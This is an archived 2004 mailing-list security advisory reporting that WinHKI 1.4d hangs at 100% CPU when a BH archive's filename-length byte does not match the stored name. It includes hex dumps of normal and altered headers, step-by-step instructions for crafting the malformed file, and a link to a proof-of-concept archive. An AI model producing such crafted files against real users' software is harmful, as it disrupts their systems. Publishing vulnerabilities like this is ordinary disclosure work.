lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <001b01c4f3c7$78d0d550$f85ab350@noone>
From: theinsider at 012.net.il (Rafel Ivgi, The-Insider)
Subject: WinHKI BH File Incorrect Filename Handeling Leads
	to 100 CPU%

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:    WinHKI
Vendors:        http://www.webtoolmaster.com
Versions:       1.4d
Platforms:      Windows
Bug:            BH File Incorrect Filename Handeling Leads to 100 CPU%
Exploitation:   Local (extract file)
Date:           24 Dec 2004
Author:         Rafel Ivgi, The-Insider
E-Mail:         the_insider@...l.com
Website:        http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

WinHKI is a file archiever which supports: BH, CAB, HKI, JAR, LHA,TAR, GZ
compressions.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

This is a normal BH compressed file header

00000000 4248 0507 2D00 2507 0302 0839 7378 3119 BH..-.%....9sx1.
00000010 0000 001B 0000 00E8 5F41 5C20 0000 0000 ........_A\ ....
00000020 0008 0000 002F 3130 372E 6874 6DB3 294E ...../107.htm.)N
00000030 2ECA 2C28 C9B6 4BCC 492D 2AD1 D0B4 D187 ..,(..K.I-*.....
00000040 08D8 F172 0100 4248 0507 7100 2507 0300 ...r..BH..q.%...
00000050 0094 A484 3100 0000 0000 0000 0000 0000 ....1...........
00000060 0010 0000 0000 004C 0000 002F 446F 6375 .......L.../Docu

The last byte in the following code, specifies the length of the
compressed file name. Once it doesn't match the filename's length
WinHKI goes into 100 CPU%

00000000 4248 0507 2D00 2507 0302 0839 7378 3119 BH..-.%....9sx1.
00000010 0000 001B 0000 00E8 5F41 5C20 0000 0000 ........_A\ ....
00000020 0008 0000 002F 3130 372E 6874 6DB3 294E ...../107.htm.)N
00000030 2ECA 2C28 C9B6 4BCC 492D 2AD1 D0B4 D187 ..,(..K.I-*.....
00000040 08D8 F172 0100 4248 0507

All we need to do is change the length of the filename specified
inside the file. Where this is the part which specifies the file name:

00000000 4248 0507 2D00 2507 0302 0839 7378 3119 BH..-.%....9sx1.
00000010 0000 001B 0000 00E8 5F41 5C20 0000 0000 ........_A\ ....
00000020 0008 0000 002F 3130 372E 6874 6DB3 294E ...../1077.htm.)N
00000030 2ECA 2C28 C9B6 4BCC 492D 2AD1 D0B4 D187 ..,(..K.I-*.....
00000040 08D8 F172 0100 4248 0507 7100 2507 0300 ...r..BH..q.%...
00000050 0094 A484 3100 0000 0000 0000 0000 0000 ....1...........
00000060 0010 0000 0000 004C 0000 002F 446F 6375 .......L.../Docu

Using any Hex editor such as HexWorkshop, just add anything to the filename.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

An online proof of concept can be found at:
http://theinsider.deep-ice.com/poc.bh

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ